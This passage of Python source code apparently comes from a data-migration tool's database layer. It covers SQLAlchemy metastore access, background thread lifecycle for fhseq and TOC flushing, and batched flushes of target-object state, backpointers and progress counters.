number of flushes logically pending
estimated time required to perform those flushes.
'''
with self.toc_lock:
qlen = 0
if self.toc_buffering:
qlen += 1
qlen += len(self.toc_flush_list)
if self.toc_flushing is not None:
qlen += 1
stats = self.stats
if snap:
stats.stat_snap_flush_NL()
count1 = stats.get('snap1_flush_count')
seconds1 = stats.get('snap1_flush_seconds')
count2 = stats.get('snap2_flush_count')
seconds2 = stats.get('snap2_flush_seconds')
count = (2 * count1) + count2
seconds = (2 * seconds1) + seconds2
mean = (seconds / count) if count else 0.5
return (qlen, mean*qlen)
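    # Worked example for the estimate above (not part of the original source):
    # with qlen=3 queued flushes, snap1 stats of 10 flushes in 5.0s and snap2
    # stats of 20 flushes in 8.0s, the weighted mean is
    # (2*5.0 + 8.0) / (2*10 + 20) = 0.45 seconds per flush, giving an
    # estimate of 0.45 * 3 = 1.35 seconds of pending flush work.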
def toc_thread_start(self):
'launch toc thread only'
self.toc_thread_state.start(self)
self.toc_thread_state.wait_for_running(self)
def fhseq_thread_start(self):
'start the fhseq thread and wait for it to complete its first fetch'
self.fhseq_thread_state.start(self)
self.fhseq_thread_state.wait_for_running(self)
with self.fhseq_lock:
while self.fhseq_thread_state.any_work_to_do_NL(self):
self.check_usable()
self.fhseq_get_cond.wait(timeout=1.0)
def fhseq_thread_stop(self):
'stop the fhseq thread and wait for it to exit'
self.fhseq_thread_state.stop()
self.fhseq_thread_state.wait_for_stopped(self)
def threads_stop(self, stop_only=False):
'stop background threads'
for threadstate in self._bkg_threadstates:
threadstate.stop()
if stop_only:
return
for threadstate in self._bkg_threadstates:
threadstate.wait_for_stopped(self)
@staticmethod
def version_format_get():
'This is the version number written as VERSION_FORMAT in the metastore'
return 1
def db_tables_create(self):
'''
Create the database tables. This implies that we are starting a new run.
'''
for dbw in self._dbws:
dbw.create_all()
# set VERSION_FORMAT in the metastore
self.db_meta_set([(DbEntMetaKey.VERSION_FORMAT, self.version_format_get())])
# PROGRESS_* are in the tobj DB so they may be updated when TargetObj states change
mdd = [(DbEntMetaKey.PROGRESS_COUNT, int(0)),
(DbEntMetaKey.PROGRESS_GB, float(0.0)),
]
self.db_meta_set(mdd, session_wrapper=self.dbtobj)
def db_dbc_restore_state(self, reset_dirs=True):
'''
We are starting up. Restore state (if any) from previous run.
This performs real, blocking DB accesses to load dbc state.
'''
self.toc_preclaim.load_startup(self, reset_dirs=reset_dirs)
self.db_load_dry_run()
def db_get_progress(self):
'Fetch the current PROGRESS values and return them in DryRunResult form'
# PROGRESS_* are in the tobj DB so they may be updated when TargetObj states change
mdk = [DbEntMetaKey.PROGRESS_COUNT,
DbEntMetaKey.PROGRESS_GB,
]
mdd = self.db_meta_get(mdk, session_wrapper=self.dbtobj)
return DryRunResult(count=mdd[DbEntMetaKey.PROGRESS_COUNT],
gb=mdd[DbEntMetaKey.PROGRESS_GB])
def db_get_reconcile_pending_count(self):
'Return the number of items pending reconcile'
ret = 0
session = self.dbtobj.session_get()
try:
for state in (TargetObjState.INODE_PENDING, TargetObjState.INODE_WRITING):
query = self.query_DbEntTargetObj.with_session(session)
query = query.filter(DbEntTargetObj.state == state)
ret += query.count()
return ret
finally:
self.dbtobj.session_release(session)
def db_get_cleanup_pending_count(self):
'Return the number of items pending cleanup'
ret = 0
session = self.dbtobj.session_get()
try:
for state in (TargetObjState.INODE_CLEANUP_PENDING, TargetObjState.INODE_CLEANUP_CLEANING):
query = self.query_DbEntTargetObj.with_session(session)
query = query.filter(DbEntTargetObj.state == state)
ret += query.count()
return ret
finally:
self.dbtobj.session_release(session)
def db_any_in_state(self, state):
'Return whether there are any target objects in the given state'
return bool(self.db_count_in_state(state, limit=1))
def db_count_all(self):
'''
Return the total number of rows in the target obj db.
May be done even with the DB in a terminal state.
'''
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
return query.count()
finally:
self.dbtobj.session_release(session)
def db_count_in_state(self, state, limit=0):
'Return the number of items in the given state'
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
query = query.filter(DbEntTargetObj.state == state)
if limit:
query = query.limit(limit)
return query.count()
finally:
self.dbtobj.session_release(session)
def db_load_dry_run(self):
'Load dry_run results'
self.dr_init = self.db_get_progress()
self.dr_current = DryRunResult(self.dr_init.to_meta())
self.progress_wrote_last_count = self.dr_current.dr_count
self.progress_wrote_last_gb = self.dr_current.dr_gb
# Pull the dry_run results from the normal metastore.
# If they were provided on the command-line, then those
# values are already poked into the DB.
self.dr_input = DryRunResult.get_from_db(self)
def db_has_eta_info(self):
if self.dr_input.dr_gb is not None and self.dr_input.dr_count is not None:
return True
return False
def db_version_format_check(self):
'Compare the VERSION_FORMAT in the metastore with ours'
logger = self._logger
m = self.db_meta_get(DbEntMetaKey.VERSION_FORMAT)
v = self.version_format_get()
if m is None:
raise TerminalError("%s does not appear to contain fully initialized state" % self._dirname)
if m != v:
raise TerminalError("%s has version_format=%s which does not match our version %d" % (self._dirname, m, v))
logger.debug("%s matched version_format=%d", self._dirname, m)
def db_meta_get(self, keys, session_wrapper=None):
'''
Given a single key in keys, return the associated value in the metastore.
Given a list of keys, return a dict of values from the metastore.
None in place of an ent means that the row does not exist.
'''
session_wrapper = session_wrapper if session_wrapper else self.dbmeta
session = session_wrapper.session_get()
try:
query = self.query_DbEntMeta.with_session(session)
if isinstance(keys, (list, tuple, set)):
ret = dict()
for key in keys:
ent = query.get(key)
if ent is not None:
ret[key] = DbEntMetaKey.value_from_dbe(key, ent.m_value)
else:
ret[key] = None
return ret
key = keys
ent = query.get(key)
if ent is None:
return None
return DbEntMetaKey.value_from_dbe(key, ent.m_value)
finally:
session_wrapper.session_release(session)
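    # A minimal usage sketch (not part of the original source); `db` stands
    # for a ClfsLoadDB instance, and db_meta_set() is the companion writer
    # defined just below:
    #
    #   phase = db.db_meta_get(DbEntMetaKey.PHASE)            # single key -> value
    #   vals = db.db_meta_get([DbEntMetaKey.PHASE,
    #                          DbEntMetaKey.VERSION_FORMAT])  # list -> dict
    #   db.db_meta_set([(DbEntMetaKey.PHASE, Phase.TRANSFER)])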
def db_meta_set(self, kvs, session_wrapper=None):
'Write a list of key, value tuples to the metastore'
session_wrapper = session_wrapper if session_wrapper else self.dbmeta
session = session_wrapper.session_get()
try:
for k, v in kvs:
value = v
if isinstance(value, enum.Enum):
value = value.value
elif isinstance(value, Filehandle):
value = value.hex()
m_value = json.dumps(value)
md = DbEntMeta(m_key=k, m_value=m_value)
session.merge(md)
session.commit()
finally:
session_wrapper.session_release(session)
class _BackgroundThreadState():
'State for one background thread'
def __init__(self, thread_shared_state, thread_name, run_cond):
self._thread_shared_state = thread_shared_state
self._thread_name = thread_name
self._thread = None
self._run_cond = run_cond
self._run_lock = run_cond._lock # pylint: disable=protected-access
self._should_run = True
self._started = False
self._is_done = False
self._slept = False
self._running = False
def __str__(self):
return self._thread_name
def __repr__(self):
return "<%s,%s,%s>" % (self.__class__.__name__, hex(id(self)), self._thread_name)
def __hash__(self):
return hash(self._thread_name)
@property
def should_run(self):
if not self._thread_shared_state.should_run:
return False
return self._should_run
@should_run.setter
def should_run(self, val):
with self._run_cond:
self._should_run = val
self._run_cond.notify_all()
@property
def is_done(self):
return self._is_done
@staticmethod
def time_wait_NL(db): # pylint: disable=unused-argument
'''
Return the maximum number of seconds to spend waiting for work (relative)
'''
return 60.0
def any_work_to_do_NL(self, db, setup_work=False):
'''
Return whether or not there is anything for the thread to do.
        Caller holds the lock associated with run_cond.
'''
raise NotImplementedError("%s(%s) did not implement this method" % (self.__class__.__name__, repr(self)))
def _do_work(self, db):
'''
Perform work designated for this thread.
'''
raise NotImplementedError("%s(%s) did not implement this method" % (self.__class__.__name__, repr(self)))
def _done_work_NL(self, db):
'''
self._do_work() has completed. This is invoked after the
lock associated with _run_cond is re-taken.
'''
# noop here in base class
def start(self, db):
'Launch the thread'
with self._run_cond:
if not self._started:
self._thread = CLFSLoadDBThread(target=self._run, name=self._thread_name, args=(db,))
self._thread.start()
self._started = True
def wait_for_running(self, db):
'wait for the thread to run'
with self._run_cond:
while not self._running:
db.check_usable()
self._run_cond.wait(timeout=30.0)
db.check_usable()
def stop(self):
'tell the thread to stop running'
with self._run_cond:
self._should_run = False
self._run_cond.notify_all()
def wait_for_stopped(self, db):
'wait for it to complete'
with self._run_cond:
self._should_run = False
self._run_cond.notify_all()
while self._started and (not self._is_done):
db.check_usable()
self._run_cond.wait(timeout=30.0)
db.check_usable()
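        # Typical lifecycle (illustration, not part of the original source),
        # as driven by ClfsLoadDB.toc_thread_start(), fhseq_thread_start()
        # and threads_stop():
        #
        #   state.start(db); state.wait_for_running(db)   # launch and sync
        #   ...                                            # thread loops in _run()
        #   state.stop(); state.wait_for_stopped(db)       # request and await exit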
def _run(self, db):
'''
Wrapper around the main loop for one background thread.
Catches exceptions and marks the DB failed so other threads
do not get stuck waiting for this thread. The caller does not
hold the lock.
'''
try:
with self._run_cond:
self._running = True
self._run_cond.notify_all()
self._run__internal(db)
except (AbortException, DbInconsistencyError, DbTerminalError, SystemExit) as e:
db.terminal_error = exc_info_err()
raise SystemExit(1) from e
except:
err = "thread %s failed" % self
db.terminal_error = exc_log(db.logger, logging.ERROR, err)
finally:
with self._run_cond:
self._is_done = True
self._run_cond.notify_all()
def _run__internal(self, db):
'''
Main loop for one background thread
db: backpointer to ClfsLoadDB. Not embedded in self
to avoid managing the circular reference.
'''
with Monitor(self._run_lock) as monitor:
while True:
if not self.should_run:
break
do_work = self.any_work_to_do_NL(db, setup_work=True)
if do_work:
monitor.release()
try:
self._do_work(db)
finally:
monitor.acquire()
self._done_work_NL(db)
self._slept = False
else:
db.check_usable()
self._slept = True
self._run_cond.wait(timeout=self.time_wait_NL(db))
    # How much to advance FHSEQ each time we fetch it
fhseq_increment = 10000
# Prefetch a new range if we do not have at least this many
# values remaining.
fhseq_low_water = 1000
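    # Example of the prefetch behaviour (not part of the original source): if
    # dbc_fhseq_get() has handed out values up to 19200 and the range reserved
    # in the DB ends at 20000, fewer than fhseq_low_water values remain, so the
    # fhseq thread reserves another fhseq_increment values (advancing the
    # stored value to 30000) before callers have to block.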
class BackgroundThreadStateFhseq(_BackgroundThreadState):
'State specific to the fhseq refresh thread'
def any_work_to_do_NL(self, db, setup_work=False):
'See base class'
if not (db.fhseq_prev and db.fhseq_dbval):
return True
if (db.fhseq_dbval - db.fhseq_prev) < db.fhseq_low_water:
return True
return False
def _do_work(self, db):
'See base class'
key = DbEntMetaKey.FHSEQ
key_name = str(key)
session = db.dbmeta.session_get()
try:
query = db.query_DbEntMeta.with_session(session)
ent = query.get(key_name)
if ent is None:
cur = Filehandle.fhseq_first_get()
ent = DbEntMeta(m_key=key_name, m_value=cur)
session.add(ent)
else:
try:
cur = int(ent.m_value)
except ValueError as e:
db.is_consistent = False
raise DbInconsistencyError("cannot interpret %s='%s' as integer" % (key_name, ent.m_value)) from e
new = cur + db.fhseq_increment
if new <= cur:
db.raise_terminal("db_fhseq_get cur=%s fhseq_increment=%s ent=%s value did not advance" % (cur, db.fhseq_increment, ent))
ent.m_value = new
session.commit()
with db.fhseq_get_cond:
db.fhseq_prev = cur
db.fhseq_dbval = new
finally:
db.dbmeta.session_release(session)
def _done_work_NL(self, db):
'See base class'
db.fhseq_get_cond.notify_all()
def db_claimable_get(self):
'Return one claimable entry'
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
states = (self.toc_state_claim_from,) + self.toc_state_claim_to
for state in states:
query2 = query.filter(DbEntTargetObj.state == state).limit(1)
for dbe in query2:
return TargetObj.from_dbe(dbe)
return None
finally:
self.dbtobj.session_release(session)
@staticmethod
def db_load_additional_backpointers_for_tobj(bpquery, tobj):
'Load the additional_backpointers for tobj'
query_result = bpquery.filter(DbEntAdditionalBackpointerMapEnt.filehandle_from == tobj.filehandle.bytes)
# Even if the query returns no results, we populate an empty AdditionalBackpointers here.
# Doing so allows us to differentiate between "nothing found" and "not loaded"
# when looking at tobj.ic_backpointer_map.
tobj.ic_backpointer_map = AdditionalBackpointers(tobj.filehandle, query_result)
@staticmethod
def db_additional_backpointers_ent_get(bpquery, filehandle_from, filehandle_to):
'Load the ent corresponding to the given filehandle_from, filehandle_to tuple'
query = bpquery.filter(DbEntAdditionalBackpointerMapEnt.filehandle_from == filehandle_from.bytes)
query = query.filter(DbEntAdditionalBackpointerMapEnt.filehandle_to == filehandle_to.bytes)
query_result = list(query)
if not query_result:
return None
if len(query_result) != 1:
raise DbInconsistencyError("db_additional_backpointers_ent_get matched %d entries for %s %s"
% (len(query_result), filehandle_from, filehandle_to))
return query_result[0]
def dbc_fhseq_get(self):
'Get a unique fhseq value.'
with self.fhseq_get_cond:
self.check_usable()
while (not self.fhseq_prev) or (not self.fhseq_dbval) or (self.fhseq_prev >= self.fhseq_dbval):
self.fhseq_run_cond.notify()
self.check_usable()
self.fhseq_get_cond.wait(timeout=30.0)
self.check_usable()
self.fhseq_prev += 1
# Trigger prefetch if we hit low-water
if self.fhseq_thread_state.any_work_to_do_NL(self):
self.fhseq_run_cond.notify()
return self.fhseq_prev
class TocBatch():
'Describes a logical chunk of changes to the database'
# Push into the flush queue if flush_dirty_count_min objects are awaiting update
# If this is too small, flushes are inefficient.
# If this is too large, then we can suddenly run out of preclaimed
# work items and need a long time to flush.
# When in the flush queue, we can allow more upserts, up to
# flush_dirty_count_nondir_max/flush_dirty_count_max objects in the batch.
flush_dirty_count_min = 900
flush_dirty_count_nondir_max = 1400
flush_dirty_count_max = 1500
# If the batch has been dirty for at least this many seconds,
# it wants to flush even if there is no other reason to do so.
# This is used to ensure that if the worker threads get busy
# for a long time handling large objects, we do not sit around
# without processing transitions to DONE. In the presence of
# objects that take a long time, we could end up repeating a
# lot of work unnecessarily in the event of a crash if we do
# not do this.
flush_dirty_seconds = 60.0
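        # Example of the timer above (not part of the original source): a
        # batch that first becomes dirty at t=100s sets flush_time to t=160s;
        # if it is still buffering at that point, flush_for_time() starts
        # returning True even if only a handful of objects have changed.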
def __init__(self, idx):
self.toc_idx = idx
self._upsert_tobj = dict() # key=Filehandle value=TargetObj
self._upsert_existing_dict = dict() # key=ExistingTargetObjKey value=list(TargetObj)
self._upsert_existing_valid = True # whether or not self._upsert_existing_dict is accurate
self._update_tobj = dict() # key=Filehandle value=_UpdateStateDesc
self._update_state = dict() # key=Filehandle value=_UpdateStateDesc
self._add_backpointer = dict() # key=Filehandle(from), value=dict(key=Filehandle(to), value=count)
self.getexistingkeys = set() # ExistingTargetObjKey
self.getexistingresults = dict() # key=ExistingTargetObjKey value=[TargetObj,...]
self.must_flush = False
            # Ideally we would set self._dirty_time = None here and update it
            # to time.time() on the first operation that adds an update. That
            # would mean checking dirty vs. non-dirty during each update
            # operation while holding a very hot lock, which causes a
            # noticeable performance lag. Instead, we use an imperfect time
            # here; the cost of the imperfection is smaller than the cost of
            # being exact.
self._dirty_time = time.time()
self.flush_time = self._dirty_time + self.flush_dirty_seconds
# flush state
self._flush_dbobjs = dict() # key=filehandle_bytes val=DbEntTargetObj
self._flush_reap_dirs = dict() # key=filehandle_bytes, value=DbEntTargetObj
self._flush_reap_check = dict() # key=filehandle_bytes, value=DbEntTargetObj
self._flush_dir_writing = list() # Ftype.DIR that changed state to WRITING
self._dir_fh_done = list() # List of Filehandle for Ftype.DIR that became TargetObjState.DONE
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, self.toc_idx)
def __len__(self):
return len(self._upsert_tobj) + len(self._update_tobj) + len(self._update_state) + len(self._add_backpointer)
def __bool__(self):
return self.must_flush \
or bool(self._upsert_tobj) \
or bool(self._update_tobj) \
or bool(self._update_state) \
or bool(self._add_backpointer) \
or bool(self.getexistingkeys)
def upsert_count_NL(self):
'Return the number of pending upserts'
return len(self._upsert_tobj)
def flush_for_time(self):
'''
Return whether this batch should flush based on
how long it has been dirty. See flush_dirty_seconds above.
'''
return bool(self) and (time.time() >= self.flush_time)
def flush_for_time_or_idle(self, db):
'''
Return whether this batch should flush based on
how long it has been dirty. See flush_dirty_seconds above.
If worker threads are idle, go ahead and flush to get things moving.
'''
if db.all_phase_threads_are_idle:
return True
return self.flush_for_time()
def time_wait_NL(self):
'''
Return the relative number of seconds between now and
when this batch should flush for the timer. Relative
because the only caller is doing a condition wait, and
those timeouts are sadly relative.
'''
return elapsed(time.time(), self.flush_time)
def upsert_ins_NL(self, tobj):
'''
Unconditionally insert or update tobj with this new value.
Caller is surrendering ownership of tobj to this cache.
Caller must not read or write tobj after this.
Except when inserting the root object, tobj.state must be TargetObjState.PENDING.
We do not explicitly check that here to avoid the cost and the special-case.
'''
#assert tobj.filehandle not in self._update_tobj # commented out for performance
self._upsert_tobj[tobj.filehandle] = tobj
self._upsert_existing_valid = False
def get_existing_NL(self, db, entkey):
'''
Return the list of matching target objects for entkey
'''
if not self._upsert_existing_valid:
self._upsert_existing_compute_NL(db)
return self._upsert_existing_dict.get(entkey, list())
def _upsert_existing_compute_NL(self, db):
'''
Compute a valid self._upsert_existing_dict
'''
with db.timers.start('upsert_existing_compute'):
for tobj in self._upsert_tobj.values():
lst = self._upsert_existing_dict.setdefault(tobj.existing_key(), list())
lst.append(tobj)
self._upsert_existing_valid = True
def update_state_ins_NL(self, tobj, usd_new):
'Cache the intent to update the state of tobj as described by usd_new'
filehandle = tobj.filehandle
if usd_new.tobj:
# assert filehandle not in self._upsert_tobj # disabled for performance
            # assert filehandle not in self._update_tobj # disabled for performance
self._update_tobj[filehandle] = usd_new
return
usd_prev = self._update_state.get(filehandle, None)
if usd_prev:
usd_prev.add(usd_new)
else:
filehandle = Filehandle(filehandle)
self._update_state[filehandle] = usd_new
def add_backpointer_ins_NL(self, tobj, backpointer):
'''
Add a backpointer (from=tobj.filehandle to=backpointer)
'''
# self._add_backpointer is self._add_backpointer[from][to] = count
filehandle_from = Filehandle(tobj.filehandle)
d_from = self._add_backpointer.setdefault(filehandle_from, dict())
count = d_from.get(backpointer, 0)
if (count + tobj.backpointer_count()) >= CLFS_LINK_MAX:
raise BackpointerLimitReached("%s at %s+%s" % (filehandle_from, count, tobj.backpointer_count()))
d_from[backpointer] = count + 1
_FLUSH__GET_DBE__COLUMNS = ('filehandle', 'ftype', 'state', 'nlink', 'first_backpointer')
def _flush__get_dbe(self, db, query, filehandle_bytes):
'During flush(), fetch one entry from the DB'
# Doing this with try/except both fastpaths the hit
# and handles the case where self._flush_dbobjs[filehandle_bytes] = None
# because we already reaped it.
try:
return self._flush_dbobjs[filehandle_bytes]
except KeyError:
pass
# We could limit the columns returned by saying:
# query = query.options(load_only(*self._FLUSH__GET_DBE__COLUMNS))
# (load_only is from sqlalchemy.orm import load_only)
# Doing so ends up being slower rather than faster, however.
dbe = query.get(filehandle_bytes)
if not dbe:
err = "%s flush filehandle=%s cannot find row" % (self, filehandle_bytes.hex())
db.logger.error("%s", err)
raise DbInconsistencyError(err)
dbe.persisted = True
self._flush_dbobjs[filehandle_bytes] = dbe
return dbe
def _flush__update_state(self, db, query, dbe, usd):
'''
Used from within flush() to handle a single update_state tuple.
Returns True to indicate that dbe is reaped.
May modify the following attributes of dbe:
state
size
child_dir_count
If that list changes, be sure to update the bulk update or reap fastpath in _flush()
'''
prev_state = dbe.state
if usd.size is not None:
dbe.size = usd.size
if (db.phase == Phase.TRANSFER) and (dbe.ftype != Ftype.DIR) and (dbe.nlink != 1) and (prev_state != TargetObjState.DONE) and (usd.state == TargetObjState.DONE):
# Set this to INODE_PENDING and not DONE so we fix up nlink
# in the reconcile phase.
dbe.state = TargetObjState.INODE_PENDING
elif (db.phase == Phase.RECONCILE) and (prev_state != TargetObjState.DONE) and (usd.state == TargetObjState.DONE):
# We must clean up the intermediate inode blob
dbe.state = TargetObjState.INODE_CLEANUP_PENDING
else:
dbe.state = usd.state
if db.phase == Phase.TRANSFER:
if dbe.ftype == Ftype.DIR:
if (dbe.state != TargetObjState.ERROR) and (dbe.state in db.phase_terminal_states):
self._dir_fh_done.append(Filehandle(dbe.filehandle))
if usd.child_dir_count is not None:
dbe.child_dir_count = usd.child_dir_count
if db.may_reap_children(dbe):
self._flush_reap_dirs[dbe.filehandle] = dbe
if (prev_state not in db.phase_terminal_states) and (dbe.state in db.phase_terminal_states):
db.dr_current.dr_count += 1
db.dr_current.dr_gb += dbe.size / Size.GB
if (dbe.state == TargetObjState.INODE_PENDING) and (prev_state != dbe.state):
dbe.reconcile_vers = dbe.reconcile_vers + 1
elif (dbe.ftype == Ftype.DIR) and (prev_state == TargetObjState.GENERATING) and (dbe.state == TargetObjState.WRITING):
db.toc_preclaim.preclaim_add_pend_writing_data(TargetObj.from_dbe(dbe))
if (dbe.state == TargetObjState.ERROR) and (prev_state != TargetObjState.ERROR):
dbe.pre_error_state = prev_state
db.stats.stat_inc('error_count_entity')
return self._flush__update_state_pre_reap(db, query, dbe)
def _flush__update_state_pre_reap(self, db, query, dbe):
'''
Figure out whether the net result of an update_state
is that the given dbe is reaped. If so, do it.
Returns whether the reap was done.
'''
if db.may_reap(dbe):
dbe_parent = self._flush__get_dbe(db, query, dbe.first_backpointer)
if db.may_reap_children(dbe_parent):
self._flush__dbe_delete(db, query, dbe)
return True
self._flush_reap_check[dbe.filehandle] = dbe
return False
def _flush__dbe_delete(self, db, query, dbe):
'''
delete dbe
'''
if dbe.persisted is None:
raise AssertionError("%s _flush__dbe_delete dbe.persisted for %s is not initialized" % (self, dbe.filehandle.hex()))
try:
if dbe.persisted:
session = query.session
session.delete(dbe)
else:
query2 = query.filter(DbEntTargetObj.filehandle == dbe.filehandle)
query2.delete(synchronize_session=False)
except BaseException as e:
db.logger.error("%s delete_persisted cannot delete %s: %s\ndbe is:\n%s",
self, dbe.filehandle.hex(), exc_info_err(), pprint.pformat(vars(dbe)))
db.raise_terminal('delete_persisted error', fromex=e)
self._flush_dbobjs[dbe.filehandle] = None
def flush(self, db, session):
'Write all pending updates in a single transaction'
with db.timers.start('flush') as timer:
self._flush(db, session)
timer.stop()
db.stats.stat_update({'flush_count' : 1,
'flush_seconds' : timer.elapsed(),
'snap0_flush_count' : 1,
'snap0_flush_seconds' : timer.elapsed(),
})
def _flush(self, db, session):
'''
Write all pending updates in a single transaction.
Do not call this directly; call flush().
'''
query = db.query_DbEntTargetObj.with_session(session)
upsert_dbe_list = list()
upsert_tobj_list = list()
with db.timers.start('flush_01_compute_upsert'):
# Note: upsert only happens during TRANSFER as a result
# of discovering new directory entries.
for tobj in self._upsert_tobj.values():
usd = self._update_state.pop(tobj.filehandle, None)
if usd or db.may_reap_children(tobj) or db.may_reap(tobj):
dbe = DbEntTargetObj.from_ic(tobj)
if usd:
self._flush__update_state(db, query, dbe, usd)
upsert_dbe_list.append(dbe)
self._flush_dbobjs[dbe.filehandle] = dbe
assert not (db.may_reap_children(dbe) or db.may_reap(dbe))
else:
# Fastpath: jam it in
db.toc_preclaim.preclaim_offer(tobj)
upsert_tobj_list.append(tobj.to_db_dict())
# info about these bulk APIs:
# https://docs.sqlalchemy.org/en/latest/faq/performance.html
# https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.bulk_save_objects
# https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.bulk_insert_mappings
# https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.bulk_update_mappings
with db.timers.start('flush_02_upsert'):
# These operations have nonzero overhead for the subtransaction
# even if the list is empty, so check emptiness first.
if upsert_dbe_list:
db.stats.stat_add('flush_upsert_tobj_slowpath', len(upsert_dbe_list))
session.bulk_save_objects(upsert_dbe_list)
if upsert_tobj_list:
session.bulk_insert_mappings(DbEntTargetObj, upsert_tobj_list, return_defaults=False, render_nulls=True)
del upsert_dbe_list
del upsert_tobj_list
update_dbe_list = list()
update_tobj_deferred = dict()
with db.timers.start('flush_03_compute_update'):
for filehandle, usd in self._update_tobj.items():
tobj = usd.tobj
# This could already be in _flush_dbobjs thanks to a reap check
if (tobj.filehandle in self._flush_dbobjs) or (tobj.filehandle in self._add_backpointer):
update_tobj_deferred[filehandle] = usd
else:
# Fastpath: bulk update or reap
dbe = DbEntTargetObj.from_ic(tobj)
if not self._flush__update_state(db, query, dbe, usd):
self._flush_dbobjs[dbe.filehandle] = dbe
update_dbe_list.append(dbe.to_db_dict())
with db.timers.start('flush_04_update'):
# These operations have nonzero overhead for the subtransaction
# even if the list is empty, so check emptiness first.
if update_dbe_list:
session.bulk_update_mappings(DbEntTargetObj, update_dbe_list)
del update_dbe_list
# Must add additional_backpointers before updating state so we
# can decide about INODE_PENDING. Note that when we did the bulk
# update above, we deferred anything in self._add_backpointer.
if self._add_backpointer:
with db.timers.start('flush_05_add_backpointers'):
bpquery = db.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
for filehandle_from, to_dict in self._add_backpointer.items():
dbe_changed = False
dbe_tobj = self._flush__get_dbe(db, query, filehandle_from.bytes)
# _flush__get_dbe raises if dbe_tobj is not found
for filehandle_to, add_count in to_dict.items():
assert add_count > 0
if dbe_tobj.first_backpointer == FILEHANDLE_NULL_BYTES:
# No first_backpointer on this target yet, so set it there.
dbe_tobj.first_backpointer = filehandle_to.bytes
add_count -= 1
dbe_changed = True
if add_count > 0:
# Add as an additional backpointer
dbe_bp = db.db_additional_backpointers_ent_get(bpquery, filehandle_from, filehandle_to)
if dbe_bp:
# Avoid += with SQLAlchemy ORM. Since we know we are
# serialized here, we can read, add, and update safely.
cur = dbe_bp.count
dbe_bp.count = cur + add_count
else:
dbe_bp = DbEntAdditionalBackpointerMapEnt(filehandle_from=filehandle_from.bytes,
filehandle_to=filehandle_to.bytes,
count=add_count)
session.add(dbe_bp)
bpquery2 = bpquery.filter(DbEntAdditionalBackpointerMapEnt.filehandle_from == filehandle_from.bytes)
new_nlink = sum([x.count for x in bpquery2])
if dbe_tobj.first_backpointer != FILEHANDLE_NULL_BYTES:
new_nlink += 1
# We may not have found all of the links yet, so only decrease
# it if we are in the reconcile phase. (At this time, we do not
# expect this code to execute in the reconcile phase; this is
# for futureproofing/clarity.)
if (new_nlink > dbe_tobj.nlink) or ((db.phase == Phase.RECONCILE) and (new_nlink != dbe_tobj.nlink)):
dbe_tobj.nlink = new_nlink
dbe_changed = True
if dbe_changed:
db.toc_preclaim.preclaim_update_for_add_backpointer(dbe_tobj)
with db.timers.start('flush_06_flush'):
session.flush()
with db.timers.start('flush_07_update_state'):
for filehandle, usd in self._update_state.items():
dbe = self._flush__get_dbe(db, query, filehandle.bytes)
self._flush__update_state(db, query, dbe, usd)
if update_tobj_deferred:
with db.timers.start('flush_08_update_state_deferred'):
db.stats.stat_add('flush_update_tobj_deferred', len(update_tobj_deferred))
for filehandle, usd in update_tobj_deferred.items():
dbe = self._flush__get_dbe(db, query, filehandle.bytes)
self._flush__update_state(db, query, dbe, usd)
# Update progress
if db.dr_current:
if db.phase == Phase.TRANSFER:
if db.dr_current.dr_count != db.progress_wrote_last_count:
md = DbEntMeta(m_key=DbEntMetaKey.PROGRESS_COUNT, m_value=json.dumps(db.dr_current.dr_count))
session.merge(md)
db.progress_wrote_last_count = db.dr_current.dr_count
if db.dr_current.dr_gb != db.progress_wrote_last_gb:
md = DbEntMeta(m_key=DbEntMetaKey.PROGRESS_GB, m_value=json.dumps(db.dr_current.dr_gb))
session.merge(md)
db.progress_wrote_last_gb = db.dr_current.dr_gb
with db.timers.start('flush_09_flush'):
session.flush()
with db.timers.start('flush_10_reap'):
self._flush__reap(db, query)
def _flush__reap(self, db, query):
'''
Called from flush(). flush() has computed updates; now determine what may be reaped.
Note that this does session.delete() directly and does not update _flush_dbobjs.
'''
# There are two loops here. The loop over flush_reap_dirs is iterating
# over parent directories that have changed state and may have reapable
# children. The loop over flush_reap_check is a loop over reapable
# children to see if they may be reaped based on parent state.
# It is possible for the same child to be deleted in both loops
# when the batch contains the relevant state transitions for both
# parent and child.
# Here we just allow that to happen.
for dbe_parent in self._flush_reap_dirs.values():
# We only need to find entries where first_backpointer points to dbe.
# If the entry has more than one backpointer, it is not eligible to be reaped.
fquery = query.filter(DbEntTargetObj.first_backpointer == dbe_parent.filehandle)
fquery = fquery.filter(DbEntTargetObj.state == TargetObjState.DONE)
fquery = fquery.filter(DbEntTargetObj.nlink == 1)
for dbe_child in fquery:
if self._flush_dbobjs.get(dbe_child.filehandle, True) is None:
# already deleted
continue
dbe_child.persisted = True
if db.may_reap(dbe_child):
self._flush__dbe_delete(db, query, dbe_child)
# No need to pop from self._flush_reap_check
# because directories are never added there in
# the first place.
# Directories are never reaped, so it is okay to search for the directory
# after the pass above.
for dbe_child in self._flush_reap_check.values():
dbe_parent = self._flush__get_dbe(db, query, dbe_child.first_backpointer)
if db.may_reap_children(dbe_parent):
self._flush__dbe_delete(db, query, dbe_child)
def postflush(self, db, session):
'''
Flush modifications are done. Do ops that depend on the result.
This is invoked after flush() within the same transaction before the commit.
'''
if self._dir_fh_done:
db.file_cleaner.handoff(self._dir_fh_done)
self._dir_fh_done = None
query = db.query_DbEntTargetObj.with_session(session)
if self.getexistingkeys:
bpquery = db.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
for existingkey in self.getexistingkeys:
fquery = query.filter(DbEntTargetObj.source_inode_number == existingkey.inode_number)
fquery = fquery.filter(DbEntTargetObj.ftype == existingkey.ftype)
fquery = fquery.filter(DbEntTargetObj.nlink > 1)
tobjs = [TargetObj.from_dbe(dbe) for dbe in fquery]
for tobj in tobjs:
# The only caller on this path is directory generation attempting
# to match an existing inode for a non-directory target.
# That caller needs the accurate current nlink, so we must
# fetch the additional_backpointers here.
db.db_load_additional_backpointers_for_tobj(bpquery, tobj)
self.getexistingresults[existingkey] = tobjs
# Drop any pending barriers. We must do this even if preserve_hardlinks
